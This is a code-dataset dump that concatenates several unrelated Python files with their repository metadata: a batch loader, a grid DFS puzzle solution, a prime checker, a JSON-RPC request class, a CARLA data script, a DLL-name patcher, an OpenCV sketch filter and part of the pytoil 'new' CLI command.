tmp_ = []
X_batch = self.iterator_train[batch:batch + self.batch_size]
for data in X_batch:
try:
img = process_sub_image(data,random_crop = self.random_crop)
#checkimage(img)
tmp_.append(img)
#print(tmp_)
except:
e_i+=1
#print("__except__time:%d data:%s"%(e_i,data))
continue
#print(img.shape)
# y_batch = self.iterator_label[batch:batch + self.batch_size]
i+=1
#print("__iter__data__batchs: %s"%i)
self.__iter_time += 1
# do some stuff to the batches like augment images or load from folders
#print("__except__time:%d"%(e_i))
tmp_ = np.asarray(tmp_)
#print(tmp_.shape)
yield [tmp_]
def get_iter_time(self):
return self.__iter_time
def __iter__(self):
c = 0
print("thread start...")
self._thread.setDaemon(True)
self._thread.start()
# load the batch generator as a python generator
# print(threading.get_ident())
# print(self._thread.ident)
#print("_iter_")
# self._queue.close()
for value in iter(self._queue.get, None):
c += 1
#print("__DEBUG__iter__%s" % c)
#print("pading.......")
yield value[0]
self._thread.join()
| 3,159 | 0 | 173 |
64687db7ce144774262e73c9d4fbce33876ba457 | 667 | py | Python | problem/01000~09999/01520/1520.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-19T16:37:44.000Z | 2019-04-19T16:37:44.000Z | problem/01000~09999/01520/1520.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 1 | 2019-04-20T11:42:44.000Z | 2019-04-20T11:42:44.000Z | problem/01000~09999/01520/1520.py3.py | njw1204/BOJ-AC | 1de41685725ae4657a7ff94e413febd97a888567 | [
"MIT"
] | 3 | 2019-04-19T16:37:47.000Z | 2021-10-25T00:45:00.000Z | import sys
sys.setrecursionlimit(100000)
m,n=map(int,input().split())
dp=[[-1]*(n+2) for i in range(m+2)]
visit=[[False]*(n+2) for i in range(m+2)]
field=[0]*(m+2)
field[0]=[11111]*(n+2)
field[m+1]=[11111]*(n+2)
for i in range(1,m+1):
field[i]=[11111]
field[i].extend([*map(int,input().split())])
field[i].append(11111)
print(DFS(1,1)) | 19.617647 | 63 | 0.565217 | import sys
sys.setrecursionlimit(100000)
def DFS(i,j):
    """Count paths from cell (i, j) to (m, n) that only step onto strictly
    lower cells, memoising results in the module-level ``dp`` table.

    ``visit`` guards against revisiting a cell on the current path; because
    moves must go strictly downhill, cycles are impossible and the memoised
    count is path-independent, so caching in ``dp`` is safe.
    """
    global m,n,dp,field,visit
    if i==m and j==n: return 1          # reached the target: one path found
    if dp[i][j]!=-1: return dp[i][j]    # already computed for this cell
    visit[i][j]=True
    dp[i][j]=0
    # Try all four orthogonal neighbours; border sentinels (11111) block exits.
    for di,dj in [[1,0],[-1,0],[0,1],[0,-1]]:
        if field[i+di][j+dj]<field[i][j] and not visit[i+di][j+dj]:
            dp[i][j]+=DFS(i+di,j+dj)
    visit[i][j]=False                   # backtrack: unmark for other paths
    return dp[i][j]
# Read an m x n height grid and count strictly-descending paths from the
# top-left (1,1) to the bottom-right (m,n) via the memoised DFS above.
m,n=map(int,input().split())
dp=[[-1]*(n+2) for i in range(m+2)]        # -1 marks "not computed yet"
visit=[[False]*(n+2) for i in range(m+2)]
field=[0]*(m+2)
# Surround the grid with a sentinel height (11111) taller than any real cell,
# so DFS never steps outside the board without explicit bounds checks.
field[0]=[11111]*(n+2)
field[m+1]=[11111]*(n+2)
for i in range(1,m+1):
    field[i]=[11111]
    field[i].extend([*map(int,input().split())])
    field[i].append(11111)
print(DFS(1,1))
e391e62ba2fcd5966a5887e57e78f4387f40acc7 | 1,122 | py | Python | python/prime_number_check3.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | null | null | null | python/prime_number_check3.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | null | null | null | python/prime_number_check3.py | leewalter/coding | 2afd9dbfc1ecb94def35b953f4195a310d6953c9 | [
"Apache-2.0"
] | 1 | 2020-08-29T17:12:52.000Z | 2020-08-29T17:12:52.000Z | # ref https://www.youtube.com/watch?v=2p3kwF04xcA&index=24&list=PLi01XoE8jYohWFPpC17Z-wWhPOSuh8Er-
import math
import time
'''
for n in range(1,21):
print(n, is_prime_v2(n))
'''
t0 = time.time()
for n in range(1,1000000):
is_prime_v2(n)
t1 = time.time()
print("time required for 1000000 :", t1-t0)
#print("test raise ", is_prime_v2(-10))
'''
if use n % 2 == 0, then
time required for 1000000 : 9.644205331802368
without above, then close timings,
time required for 1000000 : 10.904832363128662
if add % 2 and %3, then for d in range(5, max_divisor+1, 2):
then half the time !
time required for 1000000 : 5.761587858200073
'''
| 20.4 | 98 | 0.620321 | # ref https://www.youtube.com/watch?v=2p3kwF04xcA&index=24&list=PLi01XoE8jYohWFPpC17Z-wWhPOSuh8Er-
import math
import time
def is_prime_v2(n):
    """Return True if *n* is prime, False otherwise.

    Trial division up to floor(sqrt(n)), skipping multiples of 2 and 3 by
    testing only candidates of the form 6k-1 and 6k+1.

    Raises:
        ValueError: if n <= 0 (primality is defined for positive integers here).

    Fixes over the original:
    - ``raise ("...")`` raised a plain string (a TypeError under Python 3)
      and was followed by unreachable code; now raises ValueError.
    - n == 3 incorrectly returned False (it fell into the ``n % 3 == 0``
      composite branch); 3 is prime.
    """
    if n <= 0:
        raise ValueError("n must be a positive integer ! ")
    if n == 1:
        return False
    if n == 2 or n == 3:
        return True
    if n % 2 == 0 or n % 3 == 0:
        return False
    max_divisor = math.floor(math.sqrt(n))  # a factor pair always has one member <= sqrt(n)
    d = 5
    # Candidates 5, 7, 11, 13, ... i.e. 6k +/- 1; all other numbers > 3 are
    # divisible by 2 or 3 and were excluded above.
    while d <= max_divisor:
        if n % d == 0 or n % (d + 2) == 0:
            return False
        d += 6
    return True
'''
for n in range(1,21):
print(n, is_prime_v2(n))
'''
t0 = time.time()
for n in range(1,1000000):
is_prime_v2(n)
t1 = time.time()
print("time required for 1000000 :", t1-t0)
#print("test raise ", is_prime_v2(-10))
'''
if use n % 2 == 0, then
time required for 1000000 : 9.644205331802368
without above, then close timings,
time required for 1000000 : 10.904832363128662
if add % 2 and %3, then for d in range(5, max_divisor+1, 2):
then half the time !
time required for 1000000 : 5.761587858200073
'''
| 455 | 0 | 23 |
074823aa33e6960d86e8b83e4a620c6fe06c32cf | 1,014 | py | Python | round/rpc/request.py | cybergarage/round-py | fb9404835ad1eb3f4b63eac92a8de2a3e60aa38a | [
"BSD-3-Clause"
] | null | null | null | round/rpc/request.py | cybergarage/round-py | fb9404835ad1eb3f4b63eac92a8de2a3e60aa38a | [
"BSD-3-Clause"
] | null | null | null | round/rpc/request.py | cybergarage/round-py | fb9404835ad1eb3f4b63eac92a8de2a3e60aa38a | [
"BSD-3-Clause"
] | null | null | null | #################################################################
#
# Round for Python
#
# Copyright (C) Satoshi Konno 2016
#
# This is licensed under BSD-style license, see file COPYING.
#
##################################################################
from __future__ import absolute_import
import json
from .. import constants
| 22.533333 | 67 | 0.58284 | #################################################################
#
# Round for Python
#
# Copyright (C) Satoshi Konno 2016
#
# This is licensed under BSD-style license, see file COPYING.
#
##################################################################
from __future__ import absolute_import
import json
from .. import constants
class Request:
    """In-memory representation of a JSON-RPC request.

    The request is backed by a plain ``dict`` (exposed as ``self.dict``) and
    serialised to JSON via ``str()``. The protocol version is stamped in at
    construction time; ``method`` and ``params`` are settable properties.
    """

    def __init__(self):
        self.dict = {}
        # Every request advertises the JSON-RPC protocol version up front.
        self.dict[constants.JSON_RPC_JSONRPC] = constants.JSON_RPC_VERSION

    def __str__(self):
        # Serialise the backing dict straight to a JSON string.
        return json.dumps(self.dict)

    @property
    def version(self):
        """JSON-RPC protocol version (set at construction; read-only)."""
        return self.dict[constants.JSON_RPC_JSONRPC]

    @property
    def method(self):
        """Name of the remote method to invoke."""
        return self.dict[constants.JSON_RPC_METHOD]

    @method.setter
    def method(self, method):
        self.dict[constants.JSON_RPC_METHOD] = method

    @property
    def params(self):
        """Parameters payload for the remote call."""
        return self.dict[constants.JSON_RPC_PARAMS]

    @params.setter
    def params(self, params):
        self.dict[constants.JSON_RPC_PARAMS] = params
| 394 | 261 | 23 |
b14b7cdedd8f1fb33b998259010f68d2d3472946 | 5,081 | py | Python | scripts/ff_collect_pm_data.py | Czworldy/GP_traj | 96261f39a5a322092e3a6be98938bb4601f0f746 | [
"MIT"
] | 1 | 2021-06-08T06:09:55.000Z | 2021-06-08T06:09:55.000Z | scripts/ff_collect_pm_data.py | Czworldy/GP_traj | 96261f39a5a322092e3a6be98938bb4601f0f746 | [
"MIT"
] | null | null | null | scripts/ff_collect_pm_data.py | Czworldy/GP_traj | 96261f39a5a322092e3a6be98938bb4601f0f746 | [
"MIT"
] | null | null | null |
import os
import sys
from os.path import join, dirname
sys.path.insert(0, join(dirname(__file__), '..'))
import simulator
simulator.load('/home/wang/CARLA_0.9.9.4')
from simulator import config
import carla
import argparse
import time
from tqdm import tqdm
MAX_SPEED = 40
TRAJ_LENGTH = 25#25
vehicle_width = 2.0
longitudinal_sample_number_near = 8
longitudinal_sample_number_far = 0.5
lateral_sample_number = 20
lateral_step_factor = 1.0
parser = argparse.ArgumentParser(description='Params')
parser.add_argument('-d', '--data', type=int, default=1, help='data index')
parser.add_argument('-n', '--num', type=int, default=100000, help='total number')
args = parser.parse_args()
data_index = args.data
save_path = '/media/wang/DATASET/CARLA_HUMAN/town01/'+str(data_index)+'/'
sensor_dict = {
'camera':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
# 'callback':image_callback,
},
'lidar':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
# 'callback':lidar_callback,
},
}
from utils.system import env_path
env_path.remove_python2_path(sys)
import cv2
env_path.append_python2_path(sys)
from utils.collect_pm import CollectPerspectiveImage
from utils.carla_sensor import Sensor, CarlaSensorMaster
if __name__ == '__main__':
# rospy.init_node('collect_pm')
try:
main()
except KeyboardInterrupt:
#exit(0)
pass | 31.171779 | 112 | 0.678016 |
import os
import sys
from os.path import join, dirname
sys.path.insert(0, join(dirname(__file__), '..'))
import simulator
simulator.load('/home/wang/CARLA_0.9.9.4')
from simulator import config
import carla
import argparse
import time
from tqdm import tqdm
MAX_SPEED = 40
TRAJ_LENGTH = 25#25
vehicle_width = 2.0
longitudinal_sample_number_near = 8
longitudinal_sample_number_far = 0.5
lateral_sample_number = 20
lateral_step_factor = 1.0
parser = argparse.ArgumentParser(description='Params')
parser.add_argument('-d', '--data', type=int, default=1, help='data index')
parser.add_argument('-n', '--num', type=int, default=100000, help='total number')
args = parser.parse_args()
data_index = args.data
save_path = '/media/wang/DATASET/CARLA_HUMAN/town01/'+str(data_index)+'/'
sensor_dict = {
'camera':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
# 'callback':image_callback,
},
'lidar':{
'transform':carla.Transform(carla.Location(x=0.5, y=0.0, z=2.5)),
# 'callback':lidar_callback,
},
}
from utils.system import env_path
env_path.remove_python2_path(sys)
import cv2
env_path.append_python2_path(sys)
from utils.collect_pm import CollectPerspectiveImage
from utils.carla_sensor import Sensor, CarlaSensorMaster
def mkdir(path):
    """Ensure the directory ``save_path + path`` exists.

    Uses ``exist_ok=True`` instead of the original check-then-create pair
    (``os.path.exists`` followed by ``os.makedirs``), which had a TOCTOU
    race: a directory created between the check and the call raised
    FileExistsError.
    """
    os.makedirs(save_path + path, exist_ok=True)
def read_img(time_stamp):
    """Load the camera frame saved under ``save_path/img/<time_stamp>.png``.

    Returns whatever cv2.imread yields: a BGR ndarray, or None when the
    file does not exist or cannot be decoded.
    """
    frame_path = save_path + 'img/' + str(time_stamp) + '.png'
    return cv2.imread(frame_path)
def read_state():
    """Parse recorded vehicle poses from ``save_path/state/pos.txt``.

    Each non-blank line is expected to hold 7 whitespace-separated fields:
    timestamp, x, y, z, pitch, yaw, roll (order inferred from the
    assignments below -- TODO confirm against the writer of pos.txt).

    Returns:
        (time_stamp_list, time_stamp_pose_dict): the timestamps in file
        order, and a mapping from timestamp to a carla.Transform.

    NOTE(review): fields are parsed with ``eval``, which both preserves the
    int-vs-float type of the timestamp (the dict key and later filename) and
    executes arbitrary expressions from the file -- only safe for trusted,
    locally-generated logs.
    """
    state_path = save_path + 'state/'
    # read pose
    pose_file = state_path + 'pos.txt'
    time_stamp_list = []
    time_stamp_pose_dict = dict()
    file = open(pose_file, 'r')
    while 1:
        line = file.readline()
        if not line:
            break          # EOF
        if line == '\n':
            continue       # skip blank separator lines
        # print(line)
        line_list = line.split()
        index = eval(line_list[0])
        transform = carla.Transform()
        transform.location.x = eval(line_list[1])
        transform.location.y = eval(line_list[2])
        transform.location.z = eval(line_list[3])
        transform.rotation.pitch = eval(line_list[4])
        transform.rotation.yaw = eval(line_list[5])
        transform.rotation.roll = eval(line_list[6])
        time_stamp_list.append(index)
        time_stamp_pose_dict[index] = transform
    file.close()
    return time_stamp_list, time_stamp_pose_dict
def distance(pose1, pose2):
    """Straight-line distance between the locations of two transforms,
    delegated to the location object's own ``distance`` method."""
    loc_a = pose1.location
    loc_b = pose2.location
    return loc_a.distance(loc_b)
def find_traj_with_fix_length(start_index, time_stamp_list, time_stamp_pose_dict):
    """Walk forward from ``start_index`` accumulating segment lengths and
    return the first index at which the cumulative path length reaches the
    module-level ``TRAJ_LENGTH``; return -1 when the remaining recording is
    shorter than that."""
    travelled = 0.0
    last = len(time_stamp_list) - 1
    for idx in range(start_index, last):
        here = time_stamp_pose_dict[time_stamp_list[idx]]
        there = time_stamp_pose_dict[time_stamp_list[idx + 1]]
        travelled += distance(here, there)
        #print('here: '+str((idx, travelled)))
        if travelled >= TRAJ_LENGTH:
            return idx
    return -1
class Param(object):
    """Snapshot of the module-level tuning constants, bundled into one object
    for handing to CollectPerspectiveImage."""
    def __init__(self):
        # Trajectory length (metres) used when sampling poses.
        self.traj_length = float(TRAJ_LENGTH)
        # Target speed cap for the ego vehicle.
        self.target_speed = float(MAX_SPEED)
        # Vehicle width (metres) used for lateral footprint sampling.
        self.vehicle_width = float(vehicle_width)
        self.longitudinal_sample_number_near = longitudinal_sample_number_near
        self.longitudinal_sample_number_far = longitudinal_sample_number_far
        self.lateral_sample_number = lateral_sample_number
        self.lateral_step_factor = lateral_step_factor
def main():
    """Generate a "perspective mask" (pm) image for every recorded frame.

    For each timestamp: find the forward trajectory slice of fixed length
    TRAJ_LENGTH, project it into the camera frame via
    CollectPerspectiveImage.getPM, and write the result to
    ``save_path/pm/<timestamp>.png``.
    """
    mkdir('pm/')
    time_stamp_list, time_stamp_pose_dict = read_state()
    time_stamp_list.sort()
    relative_time_stamp_list = [t - time_stamp_list[0] for t in time_stamp_list]
    print(len(relative_time_stamp_list))
    param = Param()
    # Camera model mirrors the recording-time sensor configuration.
    sensor = Sensor(sensor_dict['camera']['transform'], config['camera'])
    sensor_master = CarlaSensorMaster(sensor, sensor_dict['camera']['transform'], binded=True)
    collect_perspective = CollectPerspectiveImage(param, sensor_master)
    for index in tqdm(range(len(time_stamp_list))):
        time_stamp = time_stamp_list[index]
        end_index = find_traj_with_fix_length(index, time_stamp_list, time_stamp_pose_dict)
        if end_index < 0:
            # Remaining recording is shorter than TRAJ_LENGTH: stop here.
            print('no enough traj: ', str(index), index/len(time_stamp_list))
            break
        vehicle_transform = time_stamp_pose_dict[time_stamp] # in world coordinate
        traj_pose_list = []
        for i in range(index, end_index):
            time_stamp_i = time_stamp_list[i]
            time_stamp_pose = time_stamp_pose_dict[time_stamp_i]
            traj_pose_list.append((time_stamp_i, time_stamp_pose))
        img = read_img(time_stamp)
        #t1 = time.time()
        empty_image = collect_perspective.getPM(traj_pose_list, vehicle_transform, img)
        #t2 = time.time()
        #cv2.imshow('empty_image', empty_image)
        #cv2.waitKey(3)
        cv2.imwrite(save_path+'pm/'+str(time_stamp)+'.png', empty_image)
        #print('time total: ' + str(t2-t1))
        #print()
if __name__ == '__main__':
    # rospy.init_node('collect_pm')
    # Run the extraction; Ctrl-C is treated as a clean, intentional stop.
    try:
        main()
    except KeyboardInterrupt:
        #exit(0)
        pass
e528965623d652c281c15da441bcfaa1d1f342f4 | 1,199 | py | Python | recipes/Python/576873_Patch_extensibinaries_compiled_previous/recipe-576873.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/576873_Patch_extensibinaries_compiled_previous/recipe-576873.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/576873_Patch_extensibinaries_compiled_previous/recipe-576873.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | # -*- coding: Windows-1251 -*-
'''
find_dll_name.py
List all python dll names in DLL/PYD/etc file.
Author: Denis Barmenkov <denis.barmenkov@gmail.com>
Copyright: this code is free, but if you want to use it,
please keep this multiline comment along with source.
Thank you.
2009-08-09
'''
import re
import sys
fn = sys.argv[1]
f = open(fn, 'rb')
data = f.read()
f.close()
dll_re = re.compile(r'python\d\d\.dll', re.M | re.S)
found = dll_re.findall(data)
print found
#-------------- cut here -----------------#
# -*- coding: Windows-1251 -*-
'''
patch_dll_name.py
Patch extension precompiled binary by changing python dll name.
Author: Denis Barmenkov <denis.barmenkov@gmail.com>
Copyright: this code is free, but if you want to use it,
please keep this multiline comment along with source.
Thank you.
2009-08-09
'''
import sys
import os
OLD_NAME = 'python23.dll'
NEW_NAME = 'python24.dll'
fn = sys.argv[1]
f = open(fn, 'rb')
data = f.read()
f.close()
data = data.replace(OLD_NAME, NEW_NAME)
bak_fn = fn + '.bak'
os.rename(fn, bak_fn) # rename original file to .BAK
f = open(fn, 'wb')
f.write(data) # write patched version
f.close()
# -*- coding: Windows-1251 -*-
'''
find_dll_name.py
List all python dll names in DLL/PYD/etc file.
Author: Denis Barmenkov <denis.barmenkov@gmail.com>
Copyright: this code is free, but if you want to use it,
please keep this multiline comment along with source.
Thank you.
2009-08-09
'''
# Python 2 script: scans a binary for "pythonNN.dll" strings so you can see
# which interpreter version an extension module was linked against.
import re
import sys
fn = sys.argv[1]
f = open(fn, 'rb')
data = f.read()
f.close()
# Match e.g. "python23.dll" / "python24.dll" anywhere in the raw bytes.
dll_re = re.compile(r'python\d\d\.dll', re.M | re.S)
found = dll_re.findall(data)
print found
#-------------- cut here -----------------#
# -*- coding: Windows-1251 -*-
'''
patch_dll_name.py
Patch extension precompiled binary by changing python dll name.
Author: Denis Barmenkov <denis.barmenkov@gmail.com>
Copyright: this code is free, but if you want to use it,
please keep this multiline comment along with source.
Thank you.
2009-08-09
'''
# Companion script: rewrites the embedded dll name in place (the two names
# must be the same length, or the binary's layout would be corrupted).
import sys
import os
OLD_NAME = 'python23.dll'
NEW_NAME = 'python24.dll'
fn = sys.argv[1]
f = open(fn, 'rb')
data = f.read()
f.close()
data = data.replace(OLD_NAME, NEW_NAME)
bak_fn = fn + '.bak'
os.rename(fn, bak_fn) # rename original file to .BAK
f = open(fn, 'wb')
f.write(data) # write patched version
f.close()
| 0 | 0 | 0 |
5b27ddcccb0cb4ccd03ff118b4a52ef550bf32a2 | 678 | py | Python | sketch/sketchs.py | keshab97/100-days-of-ml | 2d995b151185ba9db4d01f34565d4e059d410e33 | [
"MIT"
] | 1 | 2019-12-03T18:36:55.000Z | 2019-12-03T18:36:55.000Z | sketch/sketchs.py | keshab97/100-days-of-ml | 2d995b151185ba9db4d01f34565d4e059d410e33 | [
"MIT"
] | null | null | null | sketch/sketchs.py | keshab97/100-days-of-ml | 2d995b151185ba9db4d01f34565d4e059d410e33 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 8 08:21:19 2018
@author: alkesha
"""
import cv2
import numpy as np
#function to draw sketch
camera=cv2.VideoCapture(0)
while True:
ret,frame=camera.read()
cv2.imshow("sketch live",sketching(frame))
if cv2.waitKey(1)==ord('q'):
break
camera.release()
camera.destroyAllWindows() | 23.37931 | 63 | 0.70059 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Dec 8 08:21:19 2018
@author: alkesha
"""
import cv2
import numpy as np
#function to draw sketch
def sketching(image):
    """Convert a BGR camera frame into a pencil-sketch style binary image.

    Pipeline: grayscale -> 5x5 Gaussian blur -> Canny edge detection ->
    inverted binary threshold, so edges come out dark on a light background.
    """
    gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    blurred = cv2.GaussianBlur(gray, (5, 5), 0)
    #blurred = cv2.bilateralFilter(gray, 9, 75, 75)
    edges = cv2.Canny(blurred, 10, 50)
    _, sketch = cv2.threshold(edges, 65, 255, cv2.THRESH_BINARY_INV)
    return sketch
# Live preview: show the sketch filter applied to the default webcam until
# the user presses 'q'.
camera = cv2.VideoCapture(0)
while True:
    ret, frame = camera.read()
    if not ret:
        # Camera disconnected or frame grab failed; passing a bad frame to
        # sketching() would crash inside cv2.cvtColor.
        break
    cv2.imshow("sketch live", sketching(frame))
    if cv2.waitKey(1) == ord('q'):
        break
camera.release()
# BUG FIX: destroyAllWindows() is a cv2 module function, not a VideoCapture
# method -- the original `camera.destroyAllWindows()` raised AttributeError.
cv2.destroyAllWindows()
6272988d075e7579aa9fc785c1021ca88c2ac2ee | 10,047 | py | Python | pytoil/cli/new.py | FollowTheProcess/pytoil | b13acb14f015ae5399d7697bdc3e0e475dff03ec | [
"Apache-2.0"
] | 6 | 2021-05-08T20:31:03.000Z | 2022-03-08T01:25:43.000Z | pytoil/cli/new.py | FollowTheProcess/pytoil | b13acb14f015ae5399d7697bdc3e0e475dff03ec | [
"Apache-2.0"
] | 116 | 2021-07-08T11:21:22.000Z | 2022-03-30T14:04:51.000Z | pytoil/cli/new.py | FollowTheProcess/pytoil | b13acb14f015ae5399d7697bdc3e0e475dff03ec | [
"Apache-2.0"
] | null | null | null | """
The pytoil new command.
Author: Tom Fleet
Created: 25/06/2021
"""
from typing import List
import httpx
import typer
from cookiecutter.main import cookiecutter
from wasabi import msg
from pytoil.api import API
from pytoil.cli import utils
from pytoil.config import Config
from pytoil.environments import Conda, Environment, Venv, VirtualEnv
from pytoil.exceptions import (
CargoNotInstalledError,
EnvironmentAlreadyExistsError,
GoNotInstalledError,
)
from pytoil.git import Git
from pytoil.repo import Repo
from pytoil.starters import GoStarter, PythonStarter, RustStarter, Starter
from pytoil.vscode import VSCode
app = typer.Typer()
@app.command(context_settings={"allow_extra_args": True})
def new(
ctx: typer.Context,
project: str = typer.Argument(
...,
help="Name of the project to create.",
),
cookie: str = typer.Option(
None,
"--cookie",
"-c",
help="URL to a cookiecutter template repo from which to build the project.",
),
starter: Starter = typer.Option(
Starter.none,
"--starter",
"-s",
help="Use a language-specific starter template",
case_sensitive=False,
show_default=True,
),
venv: VirtualEnv = typer.Option(
VirtualEnv.none,
"--venv",
"-v",
help="Which type of virtual environment to create for the project.",
case_sensitive=False,
show_default=True,
),
no_git: bool = typer.Option(
False,
"--no-git",
"-n",
help="Don't initialise an empty git repo in the root of the project.",
),
) -> None:
"""
Create a new development project.
Bare usage will simply create an empty folder in your configured projects
directory.
You can also create a project from a cookiecutter template by passing a valid
url to the '--cookie/-c' flag.
If you just want a very simple, language-specific starting template, use the
'--starter/-s' option.
By default, pytoil will initialise an empty git repo in the folder, following
the style of modern language build tools such as rust's cargo. You can disable
this behaviour by setting 'init_on_new' to false in pytoil's config file
or by passing the '--no-git/-n' flag here.
If you want pytoil to create a new virtual environment for your project, you
can use the '--venv/-v' flag. Standard python and conda virtual environments
are supported.
If the '--venv/-v' flag is used, you may also pass a list of python packages
to install into the created virtual environment. These will be delegated to
the appropriate tool (pip or conda) depending on what environment was created.
If the environment is conda, the packages will be passed at environment creation
time meaning they will have their dependencies resolved together. Normal python
environments will first be created and then have specified packages installed.
If 'common_packages' is specified in pytoil's config file, these will automatically
be included in the environment.
To specify versions of packages via the command line, you must enclose them
in double quotes e.g. "flask>=1.0.0" not flask>=1.0.0 otherwise this will
be interpreted by the shell as a command redirection.
Examples:
$ pytoil new my_project
$ pytoil new my_project --cookie https://github.com/some/cookie.git
$ pytoil new my_project --venv conda
$ pytoil new my_project -c https://github.com/some/cookie.git -v conda --no-git
$ pytoil new my_project -v venv requests "flask>=1.0.0"
$ pytoil new my_project --starter python
"""
# Get config and ensure user can access API
config = Config.from_file()
utils.warn_if_no_api_creds(config)
# Setup the objects required
api = API(username=config.username, token=config.token)
repo = Repo(
owner=config.username,
name=project,
local_path=config.projects_dir.joinpath(project),
)
code = VSCode(root=repo.local_path)
git = Git()
if ctx.args:
packages: List[str] = config.common_packages + ctx.args
else:
packages = config.common_packages
# Resolve config vs flag for no-git
# flag takes priority over config
use_git: bool = config.init_on_new and not no_git
# Check is project already exists and warn/exit if so
pre_new_checks(repo=repo, api=api)
# Cant use --venv with non-python starters
if (
starter.value != starter.none # User specified starter
and starter.value != starter.python # The starter is not python
and venv.value != venv.none # And the user wants a virtual environment
):
msg.warn(
f"Can't create a venv for {starter.value} project!",
spaced=True,
exits=1,
)
# If we get here, all is well and we can create stuff!
make_new_project(
repo=repo,
git=git,
cookie=cookie,
starter=starter,
use_git=use_git,
config=config,
)
if venv.value == venv.venv:
env = create_virtualenv(repo=repo, packages=packages)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.set_workspace_python(env.executable)
code.open()
elif venv.value == venv.conda:
env = create_condaenv(repo=repo, packages=packages)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.set_workspace_python(env.executable)
code.open()
else:
# Only other allowed condition is none
typer.secho(
"Virtual environment not requested. Skipping environment creation.",
fg=typer.colors.YELLOW,
)
if config.vscode:
msg.info(f"Opening {repo.name!r} in VSCode.", spaced=True)
code.open()
def make_new_project(
repo: Repo, git: Git, cookie: str, starter: Starter, use_git: bool, config: Config
) -> None:
"""
Create a new development project either from a cookiecutter
template or from scratch.
"""
# Can't use starter and cookiecutter at the same time
if starter.value != Starter.none and cookie:
msg.warn(
"'--cookie' and '--starter' are mutually exclusive.",
exits=1,
)
if cookie:
# We don't initialise a git repo for cookiecutters
# some templates have hooks which do this, mine do!
msg.info(f"Creating {repo.name!r} from cookiecutter: {cookie!r}.")
cookiecutter(template=cookie, output_dir=config.projects_dir)
elif starter == Starter.go:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
go_st = GoStarter(path=config.projects_dir, name=repo.name)
try:
go_st.generate(username=config.username)
except GoNotInstalledError:
msg.fail("Error: Go not installed.", spaced=True, exits=1)
if use_git:
git.init(path=repo.local_path, check=True)
elif starter == Starter.python:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
py_st = PythonStarter(path=config.projects_dir, name=repo.name)
py_st.generate()
if use_git:
git.init(path=repo.local_path, check=True)
elif starter == Starter.rust:
msg.info(f"Creating {repo.name!r} from starter: {starter.value!r}.")
rs_st = RustStarter(path=config.projects_dir, name=repo.name)
try:
rs_st.generate()
except CargoNotInstalledError:
msg.fail("Error: Cargo not installed.", spaced=True, exits=1)
else:
msg.info(f"Creating {repo.name!r} at {repo.local_path}.")
# Make an empty dir and git repo
repo.local_path.mkdir(parents=True)
if use_git:
git.init(path=repo.local_path, check=True)
def pre_new_checks(repo: Repo, api: API) -> None:
"""
Checks whether the repo already exists either locally
or remotely, prints helpful warning messages and exits
the program if True.
"""
is_local = repo.exists_local()
try:
is_remote = repo.exists_remote(api=api)
except httpx.HTTPStatusError as err:
utils.handle_http_status_errors(error=err)
else:
if is_local:
msg.warn(
title=f"{repo.name} already exists locally!",
text=f"To checkout this project, use 'pytoil checkout {repo.name}'.",
spaced=True,
exits=1,
)
elif is_remote:
msg.warn(
title=f"{repo.name!r} already exists on GitHub!",
text=f"To checkout this project, use 'pytoil checkout {repo.name}'.",
spaced=True,
exits=1,
)
def create_virtualenv(repo: Repo, packages: List[str]) -> Environment:
"""
Creates and returns new virtual environment with packages and reports
to user.
"""
msg.info(
f"Creating virtual environment for {repo.name!r}",
text=f"Including packages: {', '.join(packages)}",
spaced=True,
)
env = Venv(project_path=repo.local_path)
with msg.loading("Working..."):
env.create(packages=packages)
return env
def create_condaenv(repo: Repo, packages: List[str]) -> Environment:
"""
Creates and returns new conda environment with packages and reports
to user.
"""
msg.info(
f"Creating conda environment for {repo.name!r}",
text=f"Including packages: {', '.join(packages)}",
spaced=True,
)
env = Conda(name=repo.name, project_path=repo.local_path)
try:
with msg.loading("Working..."):
env.create(packages=packages)
except EnvironmentAlreadyExistsError:
msg.warn(
f"Conda environment {env.name!r} already exists!", spaced=True, exits=1
)
return env
| 31.396875 | 87 | 0.640092 | """
The pytoil new command.
Author: Tom Fleet
Created: 25/06/2021
"""
from typing import List
import httpx
import typer
from cookiecutter.main import cookiecutter
from wasabi import msg
from pytoil.api import API
from pytoil.cli import utils
from pytoil.config import Config
from pytoil.environments import Conda, Environment, Venv, VirtualEnv
from pytoil.exceptions import (
CargoNotInstalledError,
EnvironmentAlreadyExistsError,
GoNotInstalledError,
)
from pytoil.git import Git
from pytoil.repo import Repo
from pytoil.starters import GoStarter, PythonStarter, RustStarter, Starter
from pytoil.vscode import VSCode
app = typer.Typer()
@app.command(context_settings={"allow_extra_args": True})
def new(
    ctx: typer.Context,
    project: str = typer.Argument(
        ...,
        help="Name of the project to create.",
    ),
    cookie: str = typer.Option(
        None,
        "--cookie",
        "-c",
        help="URL to a cookiecutter template repo from which to build the project.",
    ),
    starter: Starter = typer.Option(
        Starter.none,
